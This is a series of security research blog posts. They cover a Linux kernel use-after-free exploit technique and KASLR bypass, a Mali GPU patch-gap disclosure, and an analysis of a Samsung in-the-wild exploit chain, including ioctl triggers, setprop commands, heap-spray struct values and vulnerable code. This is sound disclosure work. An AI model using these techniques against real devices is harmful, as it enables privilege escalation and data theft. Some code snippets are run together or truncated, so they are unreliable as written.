It is difficult to claim that a particular code base has no vulnterabilities. While that might be possible for a specific type of vulnerabilities, it is difficult, and potentially impossible, to predict all types of vulnerabilities a complex codebase might have. After all, you can’t reason about what you don’t know.
While DER encoding is certainly a much safer choice than XML when it comes to parsing logic issues, this blog post demonstrates that such issues are still possible even with the DER format.
And what about the SHA1 collision? While the identical prefix attack shouldn’t work against DER, doesn’t that still leave the chosen prefix attack? Maybe, but that’s something to explore another time. Or maybe (hopefully) Apple will remove SHA1 support in their signature blobs and there will be nothing to explore at all.
This blog post details an exploit for CVE-2022-42703 (P0 issue 2351 - Fixed 5 September 2022), a bug Jann Horn found in the Linux kernel's memory management (MM) subsystem that leads to a use-after-free on struct anon_vma. As the bug is very complex (I certainly struggle to understand it!), a future blog post will describe the bug in full. For the time being, the issue tracker entry, this LWN article explaining what an anon_vma is and the commit that introduced the bug are great resources in order to gain additional context.
Setting the scene
Successfully triggering the underlying vulnerability causes folio->mapping to point to a freed anon_vma object. Calling madvise(..., MADV_PAGEOUT)can then be used to repeatedly trigger accesses to the freed anon_vma in folio_lock_anon_vma_read():
One potential exploit technique is to let the function return the dangling anon_vma pointer and try to make the subsequent operations do something useful. Instead, we chose to use the down_read_trylock() call within the function to corrupt memory at a chosen address, which we can do if we can control the root_anon_vma pointer that is read from the freed anon_vma.
Controlling the root_anon_vma pointer means reclaiming the freed anon_vma with attacker-controlled memory. struct anon_vma structures are allocated from their own kmalloc cache, which means we cannot simply free one and reclaim it with a different object. Instead we cause the associated anon_vma slab page to be returned back to the kernel page allocator by following a very similar strategy to the one documented here. By freeing all the anon_vma objects on a slab page, then flushing the percpu slab page partial freelist, we can cause the virtual memory previously associated with the anon_vma to be returned back to the page allocator. We then spray pipe buffers in order to reclaim the freed anon_vma with attacker controlled memory.
At this point, we’ve discussed how to turn our use-after-free into a down_read_trylock() call on an attacker-controlled pointer. The implementation of down_read_trylock() is as follows:
It was helpful to emulate the down_read_trylock() in unicorn to determine how it behaves when given different sem->count values. Assuming this code is operating on inert and unchanging memory, it will increment sem->count by 0x100 if the 3 least significant bits and the most significant bit are all unset. That means it is difficult to modify a kernel pointer and we cannot modify any non 8-byte aligned values (as they’ll have one or more of the bottom three bits set). Additionally, this semaphore is later unlocked, causing whatever write we perform to be reverted in the imminent future. Furthermore, at this point we don’t have an established strategy for determining the KASLR slide nor figuring out the addresses of any objects we might want to overwrite with our newfound primitive. It turns out that regardless of any randomization the kernel presently has in place, there’s a straightforward strategy for exploiting this bug even given such a constrained arbitrary write.
Stack corruption…
On x86-64 Linux, when the CPU performs certain interrupts and exceptions, it will swap to a respective stack that is mapped to a static and non-randomized virtual address, with a different stack for the different exception types. A brief documentation of those stacks and their parent structure, the cpu_entry_area, can be found here. These stacks are most often used on entry into the kernel from userland, but they’re used for exceptions that happen in kernel mode as well. We’ve recently seen KCTF entries where attackers take advantage of the non-randomized cpu_entry_area stacks in order to access data at a known virtual address in kernel accessible memory even in the presence of SMAP and KASLR. You could also use these stacks to forge attacker-controlled data at a known kernel virtual address. This works because the attacker task’s general purpose register contents are pushed directly onto this stack when the switch from userland to kernel mode occurs due to one of these exceptions. This also occurs when the kernel itself generates an Interrupt Stack Table exception and swaps to an exception stack - except in that case, kernel GPR’s are pushed instead. These pushed registers are later used to restore kernel state once the exception is handled. In the case of a userland triggered exception, register contents are restored from the task stack.
One example of an IST exception is a DB exception which can be triggered by an attacker via a hardware breakpoint, the associated registers of which are described here. Hardware breakpoints can be triggered by a variety of different memory access types, namely reads, writes, and instruction fetches. These hardware breakpoints can be set using ptrace(2), and are preserved during kernel mode execution in a task context such as during a syscall. That means that it’s possible for an attacker-set hardware breakpoint to be triggered in kernel mode, e.g. during a copy_to/from_user call. The resulting exception will save and restore the kernel context via the aforementioned non-randomized exception stack, and that kernel context is an exceptionally good target for our arbitrary write primitive.
Any of the registers that copy_to/from_user is actively using at the time it handles the hardware breakpoint are corruptible by using our arbitrary-write primitive to overwrite their saved values on the exception stack. In this case, the size of the copy_user call is the intuitive target. The size value is consistently stored in the rcx register, which will be saved at the same virtual address every time the hardware breakpoint is hit. After corrupting this saved register with our arbitrary write primitive, the kernel will restore rcx from the exception stack once it returns back to copy_to/from_user. Since rcx defines the number of bytes copy_user should copy, this corruption will cause the kernel to illicitly copy too many bytes between userland and the kernel.
…begets stack corruption
The attack strategy starts as follows:
Fork a process Y from process X.
Process X ptraces process Y, then sets a hardware breakpoint at a known virtual address [addr] in process Y.
Process Y makes a large number of calls to uname(2), which calls copy_to_user from a kernel stack buffer to [addr]. This causes the kernel to constantly trigger the hardware watchpoint and enter the DB exception handler, using the DB exception stack to save and restore copy_to_user state
Simultaneously make many arbitrary writes at the known location of the DB exception stack’s saved rcx value, which is Process Y’s copy_to_user’s saved length.
The DB exception stack is used rarely, so it’s unlikely that we corrupt any unexpected kernel state via a spurious DB exception while spamming our arbitrary write primitive. The technique is also racy, but missing the race simply means corrupting stale stack-data. In that case, we simply try again. In my experience, it rarely takes more than a few seconds to win the race successfully.
Upon successful corruption of the length value, the kernel will copy much of the current task’s stack back to userland, including the task-local stack cookie and return addresses. We can subsequently invert our technique and attack a copy_from_user call instead. Instead of copying too many bytes from the kernel task stack to userland, we elicit the kernel to copy too many bytes from userland to the kernel task stack! Again we use a syscall, prctl(2), that performs a copy_from_user call to a kernel stack buffer. Now by corrupting the length value, we generate a stack buffer overflow condition in this function where none previously existed. Since we’ve already leaked the stack cookie and the KASLR slide, it is trivially easy to bypass both mitigations and overwrite the return address.
Completing a ROP chain for the kernel is left as an exercise to the reader.
Fetching the KASLR slide with prefetch
Upon reporting this bug to the Linux kernel security team, our suggestion was to start randomizing the location of the percpu cpu_entry_area (CEA), and consequently the associated exception and syscall entry stacks. This is an effective mitigation against remote attackers but is insufficient to prevent a local attacker from taking advantage. 6 years ago, Daniel Gruss et al. discovered a new more reliable technique for exploiting the TLB timing side channel in x86 CPU’s. Their results demonstrated that prefetch instructions executed in user mode retired at statistically significant different latencies depending on whether the requested virtual address to be prefetched was mapped vs unmapped, even if that virtual address was only mapped in kernel mode. kPTI was helpful in mitigating this side channel, however, most modern CPUs now have innate protection for Meltdown, which kPTI was specifically designed to address, and thusly kPTI (which has significant performance implications) is disabled on modern microarchitectures. That decision means it is once again possible to take advantage of the prefetch side channel to defeat not only KASLR, but also the CPU entry area randomization mitigation, preserving the viability of the CEA stack corruption exploit technique against modern X86 CPUs.
There are surprisingly few fast and reliable examples of this prefetch KASLR bypass technique available in the open source realm, so I made the decision to write one.
Implementation
The meat of implementing this technique effectively is in serially reading the processor’s time stamp counter before and after performing a prefetch. Daniel Gruss helpfully provided highly effective and open source code for doing just that. The only edit I made (as suggested by Jann Horn) was to swap to using lfence instead of cpuid as the serializing instruction, as cpuid is emulated in VM environments. It also became apparent in practice that there was no need to perform any cache-flushing routines in order to witness the side-channel effect. It is simply enough to time every prefetch attempt.
Generating prefetch timings for all 512 possible KASLR slots yields quite a bit of fuzzy data in need of analyzing. To minimize noise, multiple samples of each tested address are taken, and the minimum value from that set of samples is used in the results as the representative value for an address. On the Tiger Lake CPU this test was primarily performed on, no more than 16 samples per slot were needed to generate exceptionally reliable results. Low-resolution minimum prefetch time slot identification narrows down the area to search in while avoiding false positives for the higher resolution edge-detection code which finds the precise address at which prefetch dramatically drops in run-time. The result of this effort is a PoC which can correctly identify the KASLR slide on my local machine with 99.999% accuracy (95% accuracy in a VM) while running faster than it takes to grep through kallsyms for the kernel base address:
This prefetch code does indeed work to find the locations of the randomized CEA regions in Peter Ziljstra’s proposed patch. However, the journey to that point results in code that demonstrates another deeply significant issue - KASLR is comprehensively compromised on x86 against local attackers, and has been for the past several years, and will be for the indefinite future. There are presently no plans in place to resolve the myriad microarchitectural issues that lead to side channels like this one. Future work is needed in this area in order to preserve the integrity of KASLR, or alternatively, it is probably time to accept that KASLR is no longer an effective mitigation against local attackers and to develop defensive code and mitigations that accept its limitations.
Conclusion
This exploit demonstrates a highly reliable and agnostic technique that can allow a broad spectrum of uncontrolled arbitrary write primitives to achieve kernel code execution on x86 platforms. While it is possible to mitigate this exploit technique from a remote context, an attacker in a local context can utilize known microarchitectural side-channels to defeat the current mitigations. Additional work in this area might be valuable to continue to make exploitation more difficult, such as performing in-stack randomization so that the stack offset of the saved state changes on every taken IST exception. For now however, this remains a viable and powerful exploit strategy on x86 Linux.
Note: The vulnerabilities discussed in this blog post (CVE-2022-33917) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable.
Introduction
In June 2022, Project Zero researcher Maddie Stone gave a talk at FirstCon22 titled 0-day In-the-Wild Exploitation in 2022…so far. A key takeaway was that approximately 50% of the observed 0-days in the first half of 2022 were variants of previously patched vulnerabilities. This finding is consistent with our understanding of attacker behavior: attackers will take the path of least resistance, and as long as vendors don't consistently perform thorough root-cause analysis when fixing security vulnerabilities, it will continue to be worth investing time in trying to revive known vulnerabilities before looking for novel ones.
The presentation discussed an in the wild exploit targeting the Pixel 6 and leveraging CVE-2021-39793, a vulnerability in the ARM Mali GPU driver used by a large number of other Android devices. ARM's advisory described the vulnerability as:
Title Mali GPU Kernel Driver may elevate CPU RO pages to writable
CVE CVE-2022-22706 (also reported in CVE-2021-39793)
Date of issue 6th January 2022
Impact A non-privileged user can get a write access to read-only memory pages [sic].
The week before FirstCon22, Maddie gave an internal preview of her talk. Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).
Taking a closer look
One of these issues (2334) lead to kernel memory corruption, one (2331) lead to physical memory addresses being disclosed to userspace and the remaining three (2325, 2327, 2333) lead to a physical page use-after-free condition. These would enable an attacker to continue to read and write physical pages after they had been returned to the system.
For example, by forcing the kernel to reuse these pages as page tables, an attacker with native code execution in an app context could gain full access to the system, bypassing Android's permissions model and allowing broad access to user data.
Anecdotally, we heard from multiple sources that the Mali issues we had reported collided with vulnerabilities available in the 0-day market, and we even saw one public reference:
In line with our 2021 disclosure policy update we then waited an additional 30 days before derestricting our Project Zero tracker entries. Between late August and mid-September 2022 we derestricted these issues in the public Project Zero tracker: 2325, 2327, 2331, 2333, 2334.
When time permits and as an additional check, we test the effectiveness of the patches that the vendor has provided. This sometimes leads to follow-up bug reports where a patch is incomplete or a variant is discovered (for a recently compiled list of examples, see the first table in this blogpost), and sometimes we discover the fix isn't there at all.
In this case we discovered that all of our test devices which used Mali are still vulnerable to these issues. CVE-2022-36449 is not mentioned in any downstream security bulletins.
Conclusion
Just as users are recommended to patch as quickly as they can once a release containing security updates is available, so the same applies to vendors and companies. Minimizing the "patch gap" as a vendor in these scenarios is arguably more important, as end users (or other vendors downstream) are blocking on this action before they can receive the security benefits of the patch.
Companies need to remain vigilant, follow upstream sources closely, and do their best to provide complete patches to users as soon as possible.
Note: The three vulnerabilities discussed in this blog were all fixed in Samsung’s March 2021 release. They were fixed as CVE-2021-25337, CVE-2021-25369, CVE-2021-25370. To ensure your Samsung device is up-to-date under settings you can check that your device is running SMR Mar-2021 or later.
As defenders, in-the-wild exploit samples give us important insight into what attackers are really doing. We get the “ground truth” data about the vulnerabilities and exploit techniques they’re using, which then informs our further research and guidance to security teams on what could have the biggest impact or return on investment. To do this, we need to know that the vulnerabilities and exploit samples were found in-the-wild. Over the past few years there’s been tremendous progress in vendor’s transparently disclosing when a vulnerability is known to be exploited in-the-wild: Adobe, Android, Apple, ARM, Chrome, Microsoft, Mozilla, and others are sharing this information via their security release notes.
While we understand that Samsung has yet to annotate any vulnerabilities as in-the-wild, going forward, Samsung has committed to publicly sharing when vulnerabilities may be under limited, targeted exploitation, as part of their release notes.
We hope that, like Samsung, others will join their industry peers in disclosing when there is evidence to suggest that a vulnerability is being exploited in-the-wild in one of their products.
The exploit sample
The Google Threat Analysis Group (TAG) obtained a partial exploit chain for Samsung devices that TAG believes belonged to a commercial surveillance vendor. These exploits were likely discovered in the testing phase. The sample is from late 2020. The chain merited further analysis because it is a 3 vulnerability chain where all 3 vulnerabilities are within Samsung custom components, including a vulnerability in a Java component. This exploit analysis was completed in collaboration with Clement Lecigne from TAG.
The sample used three vulnerabilities, all patched in March 2021 by Samsung:
Arbitrary file read/write via the clipboard provider - CVE-2021-25337
Kernel information leak via sec_log - CVE-2021-25369
Use-after-free in the Display Processing Unit (DPU) driver - CVE-2021-25370
The exploit sample targets Samsung phones running kernel 4.14.113 with the Exynos SOC. Samsung phones run one of two types of SOCs depending on where they’re sold. For example the Samsung phones sold in the United States, China, and a few other countries use a Qualcomm SOC and phones sold most other places (ex. Europe and Africa) run an Exynos SOC. The exploit sample relies on both the Mali GPU driver and the DPU driver which are specific to the Exynos Samsung phones.
Examples of Samsung phones that were running kernel 4.14.113 in late 2020 (when this sample was found) include the S10, A50, and A51.
The in-the-wild sample that was obtained is a JNI native library file that would have been loaded as a part of an app. Unfortunately TAG did not obtain the app that would have been used with this library. Getting initial code execution via an application is a path that we’ve seen in other campaigns this year. TAG and Project Zero published detailed analyses of one of these campaigns in June.
Vulnerability #1 - Arbitrary filesystem read and write
The exploit chain used CVE-2021-25337 for an initial arbitrary file read and write. The exploit is running as the untrusted_app SELinux context, but uses the system_server SELinux context to open files that it usually wouldn’t be able to access. This bug was due to a lack of access control in a custom Samsung clipboard provider that runs as the system user.
About Android content providers
In Android, Content Providers manage the storage and system-wide access of different data. Content providers organize their data as tables with columns representing the type of data collected and the rows representing each piece of data. Content providers are required to implement six abstract methods: query, insert, update, delete, getType, and onCreate. All of these methods besides onCreate are called by a client application.
All applications can read from or write to your provider, even if the underlying data is private, because by default your provider does not have permissions set. To change this, set permissions for your provider in your manifest file, using attributes or child elements of the <provider> element. You can set permissions that apply to the entire provider, or to certain tables, or even to certain records, or all three.
The vulnerability
Samsung created a custom clipboard content provider that runs within the system server. The system server is a very privileged process on Android that manages many of the services critical to the functioning of the device, such as the WifiService and TimeZoneDetectorService. The system server runs as the privileged system user (UID 1000, AID_system) and under the system_server SELinux context.
Samsung added a custom clipboard content provider to the system server. This custom clipboard provider is specifically for images. In the com.android.server.semclipboard.SemClipboardProvider class, there are the following variables:
CREATE_TABLE = " CREATE TABLE ClipboardImageTable (id INTEGER PRIMARY KEY AUTOINCREMENT, _data TEXT NOT NULL);";
Unlike content providers that live in “normal” apps and can restrict access via permissions in their manifest as explained above, content providers in the system server are responsible for restricting access in their own code. The system server is a single JAR (services.jar) on the firmware image and doesn’t have a manifest for any permissions to go in. Therefore it’s up to the code within the system server to do its own access checking.
UPDATE 10 Nov 2022: The system server code is not an app in its own right. Instead its code lives in a JAR, services.jar. Its manifest is found in /system/framework/framework-res.apk. In this case, the entry for the SemClipboardProvider in the manifest is:
Like “normal” app-defined components, the system server could use the android:permissionattribute to control access to the provider, but it does not. Since there is not a permission required to access the SemClipboardProvider via the manifest, any access control must come from the provider code itself. Thanks to Edward Cunningham for pointing this out!
The ClipboardImageTable defines only two columns for the table as seen above: id and _data. The column name _data has a special use in Android content providers. It can be used with the openFileHelper method to open a file at a specified path. Only the URI of the row in the table is passed to openFileHelper and a ParcelFileDescriptor object for the path stored in that row is returned. The ParcelFileDescriptor class then provides the getFd method to get the native file descriptor (fd) for the returned ParcelFileDescriptor.
publicUri insert(Uri uri,ContentValues values){
long row =this.database.insert(TABLE_NAME,"", values);
if(row >0){
Uri newUri =ContentUris.withAppendedId(CONTENT_URI, row);
thrownewSQLException("Fail to add a new record into "+ uri);
}
The function above is the vulnerable insert() method in com.android.server.semclipboard.SemClipboardProvider. There is no access control included in this function so any app, including the untrusted_app SELinux context, can modify the _data column directly. By calling insert, an app can open files via the system server that it wouldn’t usually be able to open on its own.
The exploit triggered the vulnerability with the following code from an untrusted application on the device. This code returned a raw file descriptor.
Let’s walk through what is happening line by line:
Create a ContentValues object. This holds the key, value pair that the caller wants to insert into a provider’s database table. The key is the column name and the value is the row entry.
Set the ContentValues object: the key is set to “_data” and the value to an arbitrary file path, controlled by the exploit.
Get the URI to access the semclipboardprovider. This is set in the SemClipboardProvider class.
Get the ContentResolver object that allows apps access to ContentProviders.
Call insert on the semclipboardprovider with our key-value pair.
Open the file that was passed in as the value and return the raw file descriptor. openFileDescriptor calls the content provider’s openFile, which in this case simply calls openFileHelper.
The exploit wrote their next stage binary to the directory /data/system/users/0/. The dropped file will have an SELinux context of users_system_data_file. Normal untrusted_app’s don’t have access to open or create users_system_data_file files so in this case they are proxying the open through system_server who can open users_system_data_file. While untrusted_app can’t open users_system_data_file, it can read and write to users_system_data_file. Once the clipboard content provider opens the file and passess the fd to the calling process, the calling process can now read and write to it.
The exploit first uses this fd to write their next stage ELF file onto the file system. The contents for the stage 2 ELF were embedded within the original sample.
This vulnerability is triggered three more times throughout the chain as we’ll see below.
Fixing the vulnerability
To fix the vulnerability, Samsung added access checks to the functions in the SemClipboardProvider. The insert method now checks if the PID of the calling process is UID 1000, meaning that it is already also running with system privileges.
publicUri insert(Uri uri,ContentValues values){
if(Binder.getCallingUid()!=1000){
Log.e(TAG,"Fail to insert image clip uri. blocked the access of package : "+ getContext().getPackageManager().getNameForUid(Binder.getCallingUid()));
returnnull;
}
long row =this.database.insert(TABLE_NAME,"", values);
if(row >0){
Uri newUri =ContentUris.withAppendedId(CONTENT_URI, row);
thrownewSQLException("Fail to add a new record into "+ uri);
}
Executing the stage 2 ELF
The exploit has now written its stage 2 binary to the file system, but how do they load it outside of their current app sandbox? Using the Samsung Text to Speech application (SamsungTTS.apk).
The Samsung Text to Speech application (com.samsung.SMT) is a pre-installed system app running on Samsung devices. It is also running as the system UID, though as a slightly less privileged SELinux context, system_app rather than system_server. There has been at least one previously public vulnerability where this app was used to gain code execution as system. What’s different this time though is that the exploit doesn’t need another vulnerability; instead it reuses the stage 1 vulnerability in the clipboard to arbitrarily write files on the file system.
Older versions of the SamsungTTS application stored the file path for their engine in their Settings files. When a service in the application was started, it obtained the path from the Settings file and would load that file path as a native library using the System.load API.
The exploit takes advantage of this by using the stage 1 vulnerability to write its file path to the Settings file and then starting the service which will then load its stage 2 executable file as system UID and system_app SELinux context.
To do this, the exploit uses the stage 1 vulnerability to write the following contents to two different files: /data/user_de/0/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml and /data/data/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml. Depending on the version of the phone and application, the SamsungTTS app uses these 2 different paths for its Settings files.
The SMT_LATEST_INSTALLED_ENGINE_PATH is the file path passed to System.load(). To initiate the process of the system loading, the exploit stops and restarts the SamsungTTSService by sending two intents to the application. The SamsungTTSService then initiates the load and the stage 2 ELF begins executing as the system user in the system_app SELinux context.
The exploit sample is from at least November 2020. As of November 2020, some devices had a version of the SamsungTTS app that did this arbitrary file loading while others did not. App versions 3.0.04.14 and before included the arbitrary loading capability. It seems like devices released on Android 10 (Q) were released with the updated version of the SamsungTTS app which did not load an ELF file based on the path in the settings file. For example, the A51 device that launched in late 2019 on Android 10 launched with version 3.0.08.18 of the SamsungTTS app, which does not include the functionality that would load the ELF.
Phones released on Android P and earlier seemed to have a version of the app pre-3.0.08.18 which does load the executable up through December 2020. For example, the SamsungTTS app from this A50 device on the November 2020 security patch level was 3.0.03.22, which did load from the Settings file.
Once the ELF file is loaded via the System.load api, it begins executing. It includes two additional exploits to gain kernel read and write privileges as the root user.
Vulnerability #2 - task_struct and sys_call_table address leak
Once the second stage ELF is running (and as system), the exploit then continues. The second vulnerability (CVE-2021-25369) used by the chain is an information leak to leak the address of the task_struct and sys_call_table. The leaked sys_call_table address is used to defeat KASLR. The addr_limit pointer, which is used later to gain arbitrary kernel read and write, is calculated from the leaked task_struct address.
The vulnerability is in the access permissions of a custom Samsung logging file: /data/log/sec_log.log.
The exploit abused a WARN_ON in order to leak the two kernel addresses and therefore break ASLR.WARN_ON is intended to only be used in situations where a kernel bug is detected because it prints a full backtrace, including stack trace and register values, to the kernel logging buffer, /dev/kmsg.
oid __warn(constchar*file,int line,void*caller,unsigned taint,
struct pt_regs *regs,struct warn_args *args)
{
disable_trace_on_warning();
pr_warn("------------[ cut here ]------------\n");
if(file)
pr_warn("WARNING: CPU: %d PID: %d at %s:%d %pS\n",
raw_smp_processor_id(), current->pid, file, line,
caller);
else
pr_warn("WARNING: CPU: %d PID: %d at %pS\n",
raw_smp_processor_id(), current->pid,caller);
if(args)
vprintk(args->fmt, args->args);
if(panic_on_warn){
/*
* This thread may hit another WARN() in the panic path.
* Resetting this prevents additional WARN() from panicking the
* system on this thread. Other threads are blocked by the
* panic_mutex in panic().
*/
panic_on_warn =0;
panic("panic_on_warn set ...\n");
}
print_modules();
dump_stack();
print_oops_end_marker();
/* Just a warning, don't kill lockdep. */
add_taint(taint, LOCKDEP_STILL_OK);
}
On Android, the ability to read from kmsg is scoped to privileged users and contexts. While kmsg is readable by system_server, it is not readable from the system_app context, which means it’s not readable by the exploit.
a51:/ $ ls -alZ /dev/kmsg
crw-rw----1 root system u:object_r:kmsg_device:s0 1,112022-10-2721:48/dev/kmsg
$ sesearch -A -s system_server -t kmsg_device -p read precompiled_sepolicy
Samsung however has added a custom logging feature that copies kmsg to the sec_log. The sec_log is a file found at /data/log/sec_log.log.
The WARN_ON that the exploit triggers is in the Mali GPU graphics driver provided by ARM. ARM replaced the WARN_ON with a call to the more appropriate helper pr_warn in release BX304L01B-SW-99002-r21p0-01rel1 in February 2020. However, the A51 (SM-A515F) and A50 (SM-A505F) still used a vulnerable version of the driver (r19p0) as of January 2021.
Specifically the WARN_ON is in the function kbase_vinstr_hwcnt_reader_ioctl. To trigger, the exploit only needs to call an invalid ioctl number for the HWCNT driver and the WARN_ON will be hit. The exploit makes two ioctl calls: the first is the Mali driver’s HWCNT_READER_SETUP ioctl to initialize the hwcnt driver and be able to call ioctl’s and then to the hwcnt ioctl target with an invalid ioctl number: 0xFE.
hwcnt_fd = ioctl(dev_mali_fd,0x40148008,&v4);
ioctl(hwcnt_fd,0x4004BEFE,0);
To trigger the vulnerability the exploit sends an invalid ioctl to the HWCNT driver a few times and then triggers a bug report by calling:
setprop dumpstate.options bugreportfull;
setprop ctl.start bugreport;
In Android, the property ctl.start starts a service that is defined in init. On the targeted Samsung devices, the SELinux policy for who has access to the ctl.start property is much more permissive than AOSP’s policy. Most notably in this exploit’s case, system_app has access to set ctl_start and thus initiate the bugreport.
allow at_distributor ctl_start_prop:file { getattr map open read };
The bugreport service in dumpstate.rc is a Samsung-specific customization. The AOSP version of dumpstate.rc doesn’t include this service.
The Samsung version of the dumpstate (/system/bin/dumpstate) binary then copies everything from /proc/sec_log to /data/log/sec_log.log as shown in the pseudo-code below. This is the first few lines of the dumpstate() function within the dumpstate binary. The dump_sec_log (symbols included within the binary) function copies everything from the path provided in argument two to the path provided in argument three.
After starting the bugreport service, the exploit uses inotify to monitor for IN_CLOSE_WRITE events in the /data/log/ directory. IN_CLOSE_WRITE triggers when a file that was opened for writing is closed. So this watch will occur when dumpstate is finished writing to sec_log.log.
An example of the sec_log.log file contents generated after hitting the WARN_ON statement is shown below. The exploit combs through the file contents looking for two values on the stack that are at address *b60 and *bc0: the task_struct and the sys_call_table address.
<4>[90808.635627] [4: poc:25943] ------------[ cut here ]------------
The file /data/log/sec_log.log has the SELinux context dumplog_data_file which is widely accessible to many apps as shown below. The exploit is currently running within the SamsungTTS app which is the system_app SELinux context. While the exploit does not have access to /dev/kmsg due to SELinux access controls, it can access the same contents when they are copied to the sec_log.log which has more permissive access.
$ sesearch -A -t dumplog_data_file -c file -p open precompiled_sepolicy | grep _app
There were a few different changes to address this vulnerability:
Modified the dumpstate binary on the device – As of the March 2021 update, dumpstate no longer writes to /data/log/sec_log.log.
Removed the bugreport service from dumpstate.rc.
In addition there were a few changes made earlier in 2020 that when included would prevent this vulnerability in the future:
As mentioned above, in February 2020 ARM had released version r21p0 of the Mali driver which had replaced the WARN_ON with the more appropriate pr_warn which does not log a full backtrace. The March 2021 Samsung firmware included updating from version r19p0 of the Mali driver to r26p0 which used pr_warn instead of WARN_ON.
Vulnerability #3 - Arbitrary kernel read and write
The final vulnerability in the chain (CVE-2021-25370) is a use-after-free of a file struct in the Display and Enhancement Controller (DECON) Samsung driver for the Display Processing Unit (DPU). According to the upstream commit message, DECON is responsible for creating the video signals from pixel data. This vulnerability is used to gain arbitrary kernel read and write access.
Find the PID of android.hardware.graphics.composer
To be able to trigger the vulnerability the exploit needs an fd for the driver in order to send ioctl calls. To find the fd, the exploit has to to iterate through the fd proc directory for the target process. Therefore the exploit first needs to find the PID for the graphics process.
The exploit connects to LogReader which listens at/dev/socket/logdr. When a client connects to LogReader, LogReader writes the log contents back to the client. The exploit then configures LogReader to send it logs for the main log buffer (0), system log buffer (3), and the crash log buffer (4) by writing back to LogReader via the socket:
stream lids=0,3,4
The exploit then monitors the log contents until it sees the words ‘display’ or ‘SDM’. Once it finds a ‘display’ or ‘SDM’ log entry, the exploit then reads the PID from that log entry.
Next the exploit needs to find the full file path for the DECON driver. The full file path can exist in a few different places on the filesystem so to find which one it is on this device, the exploit iterates through the /proc/<PID>/fd/ directory looking for any file path that contains “graphics/fb0”, the DECON driver. It uses readlink to find the file path for each /proc/<PID>/fd/<fd>. The semclipboard vulnerability (vulnerability #1) is then used to get the raw file descriptor for the DECON driver path.
Triggering the Use-After-Free
The vulnerability is in the decon_set_win_config function in the Samsung DECON driver. The vulnerability is a relatively common use-after-free pattern in kernel drivers. First, the driver acquires an fd for a fence. This fd is associated with a file pointer in a sync_file struct, specifically the file member. A “fence” is used for sharing buffers and synchronizing access between drivers and different processes.
/**
* struct sync_file - sync file to export to the userspace
* @file: file representing this fence
* @sync_file_list: membership in global file list
* @wq: wait queue for fence signaling
* @fence: fence with the fences in the sync_file
* @cb: fence callback information
*/
struct sync_file {
struct file *file;
/**
* @user_name:
*
* Name of the sync file provided by userspace, for merged fences.
* Otherwise generated through driver callbacks (in which case the
* entire array is 0).
*/
char user_name[32];
#ifdef CONFIG_DEBUG_FS
struct list_head sync_file_list;
#endif
wait_queue_head_t wq;
unsignedlong flags;
struct dma_fence *fence;
struct dma_fence_cb cb;
};
The driver then calls fd_install on the fd and file pointer, which makes the fd accessible from userspace and transfers ownership of the reference to the fd table. Userspace is able to call close on that fd. If that fd holds the only reference to the file struct, then the file struct is freed. However, the driver continues to use the pointer to that freed file struct.
decon_err("%s: failed to create sync file\n", __func__);
return-ENOMEM;
}
fd = decon_get_valid_fd();
if(fd <0){
decon_err("%s: failed to get unused fd\n", __func__);
fput((*sync_file)->file);
}
return fd;
}
The function then calls fd_install(win_data->retire_fence, sync_file->file) which means that userspace can now access the fd. When fd_install is called, another reference is not taken on the file so when userspace calls close(fd), the only reference on the file is dropped and the file struct is freed. The issue is that after calling fd_install the function then calls decon_create_release_fences(decon, win_data, sync_file) with the same sync_file that contains the pointer to the freed file struct.
decon_create_release_fences gets a new fd, but then associates that new fd with the freed file struct, sync_file->file, in the call to fd_install.
When decon_set_win_config returns, retire_fence is the closed fd that points to the freed file struct and rel_fence is the open fd that points to the freed file struct.
Fixing the vulnerability
Samsung fixed this use-after-free in March 2021 as CVE-2021-25370. The fix was to move the call to fd_install in decon_set_win_config to the latest possible point in the function after the call to decon_create_release_fences.
To groom the heap the exploit first opens and closes 30,000+ files using memfd_create. Then, the exploit sprays the heap with fake file structs. On this version of the Samsung kernel, the file struct is 0x140 bytes. In these new, fake file structs, the exploit sets four of the members:
fake_file.f_u =0x1010101;
fake_file.f_op = kaddr -0x2071B0+0x1094E80;
fake_file.f_count =0x7F;
fake_file.private_data =addr_limit_ptr;
The f_op member is set to the signalfd_op for reasons we will cover below in the “Overwriting the addr_limit” section. kaddr is the address leaked using vulnerability #2 described previously. The addr_limit_ptr was calculated by adding 8 to the task_struct address also leaked using vulnerability #2.
The exploit sprays 25 of these structs across the heap using the MEM_PROFILE_ADD ioctl in the Mali driver.
/**
* struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel
* @buffer: Pointer to the information
* @len: Length
* @padding: Padding
*
* The data provided is accessible through a debugfs file
This ioctl takes a pointer to a buffer, the length of the buffer, and padding as arguments. kbase_api_mem_profile_add will allocate a buffer on the kernel heap and then will copy the passed buffer from userspace into the newly allocated kernel buffer.
Finally, kbase_api_mem_profile_add calls kbasep_mem_profile_debugfs_insert. This technique only works when the device is running a kernel with CONFIG_DEBUG_FS enabled. The purpose of the MEM_PROFILE_ADD ioctl is to write a buffer to DebugFS. As of Android 11, DebugFS should not be enabled on production devices. Whenever Android launches new requirements like this, it only applies to devices launched on that new version of Android. Android 11 launched in September 2020 and the exploit was found in November 2020 so it makes sense that the exploit targeted devices Android 10 and before where DebugFS would have been mounted.
For example, on the A51 exynos device (SM-A515F) which launched on Android 10, both CONFIG_DEBUG_FS is enabled and DebugFS is mounted.
Because DebugFS is mounted, the exploit is able to use the MEM_PROFILE_ADD ioctl to groom the heap. If DebugFS wasn’t enabled or mounted, kbasep_mem_profile_debugfs_insert would simply free the newly allocated kernel buffer and return.
#ifdef CONFIG_DEBUG_FS
int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx,char*data,
int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx,char*data,
size_t size)
{
kfree(data);
return0;
}
#endif/* CONFIG_DEBUG_FS */
By writing the fake file structs as a singular 0x2000 size buffer rather than as 25 individual 0x140 size buffers, the exploit will be writing their fake structs to two whole pages which increases the odds of reallocating over the freed file struct.
